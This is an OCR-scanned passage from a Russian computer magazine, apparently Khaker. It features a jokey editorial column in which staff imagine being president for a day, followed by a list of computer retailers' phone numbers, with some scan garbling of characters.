мельчайших червячков. В скором времени червячки выросли, возмужали, 
и разорвали мальчика на части. Будьте ближе к природе 
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НАМ ООВЕРЯгаТ ОАЖЕ СПЕЦАГЕНТЫ 



ты, НАВЕРНОЕ, МЕЧТАЛ СТАТЬ ВАЖНОЙ ШИШКОЙ? НЕ 
СОМНЕВАЮСЬ. Я ТОЖЕ КАЖДЫЙ ВЕЧЕР ПЕРЕД СНОМ 
ПРЕДСТАВЛЯЮ СЕБЯ САШЕЙ БЕЛЫМ :). МНЕ ВОТ СТАЛО ИН- 
ТЕРЕСНО, ЧТО БЫ СДЕЛАЛИ НАШИ РЕДАКТОРЫ, ПОЛУЧИ 
ОНИ НА СУТКИ ПРАВО БЫТЬ ПРЕЗИДЕНТОМ? 

ПІІІІНІІІТ022 Наверное, тут полагается сказать что-то вроде «і'ІІ Іедаііге І1», или «выдал бы Форбу Президентскую стипендию». На самом 
деле, ничего из этого я бы не сделал. Самый честный ответ — ушел бы в отставку. Соображения такие: быть президентом я не хочу, это 
слишком сложно, я хочу жить нормальной жизнью. Однако несколько рекомендаций своему приемнику я бы дал. Вот что меня бесит, так 
это то, что все люди давным-давно привыкли и воспринимают как должное, когда государственные служащие дерьмово выполняют свою 
работу. Весь наш бюрократический аппарат сгнил еще при рождении, давно пора заменить архаичный бумажный оборот справок и 
постановлений на электронный учет. Это снизит в разы мелкое взяточничество, поможет уволить 2/3 госслужащих, а остальным платить 
сносные зарплаты. Еще экономику вот надо развивать: наша сегодняшняя нефтяная стабильность — шаткая штука. Налоговую систему 
нужно менять глобально, чтобы развивать мелкое, прежде всего, предпринимательство. И еще, я бы более жестко отстаивал внешние 
интересы нашей страны. Сегодня ни жесткости, ни последовательности, не наблюдается. И нашим, и вашим тут не пройдет. Вообще, дерьмо 
какое-то я написал. Извините уж, какой вопрос, такой и ответ. ЗТ6Р Что бы я сделал, если на день стал президентом? Сложно сказать, 
но одно я знаю наверняка — ничего полезного :). Получив от Бублика задание, я чуть было не принялся за подготовку осмысленного ответа 
с глубоким анализом текущего положения нашей страны, но потом решил, что с этой задачей лучше справится молодой специалист-заучка 
из экономического ВУЗа. Да и вообще, нафиг оно надо? При всем желании за день ничего толкового не сделаешь, кардинально ничего не 
изменишь. Так что не буду даже и пробовать: идея профукать этот день впустую как-то не прельщает. С детства есть у меня одна небольшая 
мечта — проехать в шикарной правительственной машине в сопровождении кавалькады крутых милицейских авто. Глупость, правда? Но 
зато сейчас появилась отличная возможность претворить ее в жизнь. Только представь: можно совершенно законно нестись с 
баснословной скоростью в городе и по шоссе, половина дорог перекрыта, а там где нет — все машины расступаются перед тобой. Неважно, 
кто едет впереди: будь то «копейка» или новенький Ламборджини. Его отметут в сторону, так как. все обязаны уступить. Ты самая важная 
персона. Ты президент. ІНІІІІПТ Кабы я была царицей... Ой, то есть, если бы я вдруг стал президентом РФ, то обязательно бы накурился в 
хлам. Просто я всегда, когда становлюсь президентом, накуриваюсь в хлам — привычка, блин. Моей левой рукой стал бы Бублик: писал бы 
за меня (потому что я левша) и разные другие дела полезные совершал ею, как то: почесывание за ухом, открывание пол-литровой бутылки 
«Кока-Колы», закрывание пол-литровой бутылки «Кока-Колы» и так далее. Еще я бы принял закон, который запрещает разговаривать с 
13:00 до 14:00. Тогда в стране наступала бы полная тишина, а я, используя современную систему усиления звука, включал бы микрофон и 
голосил песни. Все бы слушали и плакали. И умирали, потому что у них отваливались бы уши :(. Так, еще 300 байт... Уважаемые читатели, 
как вы думаете, если таракану отрезать голову, он успеет сказать «бип твою бип»? Никак не поймаю ни одного для тестов, а интересно, 
блин. Так, фуф, вроде отпустило. 0Й.ІН10ІІПІІІ2 Если бы я был президентом... конечно, я бы придал журналу Хакер статус официального, 
государственного журнала и прибавил бы к нему ХакерСпец «Закон», в котором я бы изливал свои новые законы, акты и нормы. Не забыл бы 
я и наследие предков. Вот, например, кодекс Хаммурапи — как насчет выдавать чиновникам зарплату темным пивом, а за бюрократию — рубить 
руки? Хороший закон! Конечно, отдельным постановлением я бы заставил всех водил выучить ПДД в нужном объеме, а все неправильно 
припаркованные около редакции машины — отдавал бы жителям Острова Маврикий в знак дружбы между народами. Ну и конечно, в 
обязательном порядке выписал 50 ударов палкой по пяткам Хинту и забанил бы их с Бубликом в ЖЖ. Для поднятия скорости работы :) 
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Москва: АБ-групп (095) 745-51 75; Акситек (095) 784-7224; Банкос (095) 1 28-9022; ДЕЛ (095) 250-5536; Дилайн (095) 969-2222; Инкотрейд (095) 1 76-2873; ИНЭЛ (095) 742-6436; Карин (095) 956-1 1 58 
Компьютерный салон ЗМЗ (095) 956-1225; Компания КИТ (095) 777-6655; Никс (095) 974-3333; ОЛДИ (095) 105-0700; Регард (095) 912-4224; Сетевая Лаборатория (095) 784-6490 
СКИД (095) 232-3324; Тринити Электронике (095) 737-8046; Формоза (095) 234-2164; Ф-Центр (095) 472-6104; ЭЛСТ (095) 728-4060; РІаке (095) 236-992; Рогсе Сотриіегз (095) 775-6655 
ІЗМ (095) 718-4020; Меі)іп (095) 727-1222; НТ Сотриіег (095) 970-1930; В-ЗІуІе Тгасііпд (095) 514-1414; УЗН Сотриіегз (095) 755-8202; УЕТРА Сотриіегз (095) 729-5255; ЭЛЕКТОН (095) 956-3819 
ПортКом (095)777-0210; Архангельск: Северная Корона (8182) 653-525; Волгоград: Техком (8612) 699-850; Воронеж: Рет (0732) 779-339; РІ/ІАН (0732) 512-412; Сани (0732) 54-00-00 
Иркутск: Билайн (3952) 240-024; Комтек (3952) 258-338; Краснодар: Игрек (8612) 699-850; Лабытнанги: КЦ ЯМАЛ (34992) 51777; Липецк: Регард-тур (0742) 485-285 
Новосибирск: Квеста (38322) 332-407; Нижний Новгород: Бюро-К (8312) 422-367; Пермь: Раском (8612) 699-850; Ростов-на-Дону: Зенит-Компьютер (8632) 950-300 
Тюмень: ИНЭКС-Техника (3452) 390-036. 
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работу профессионалам. 
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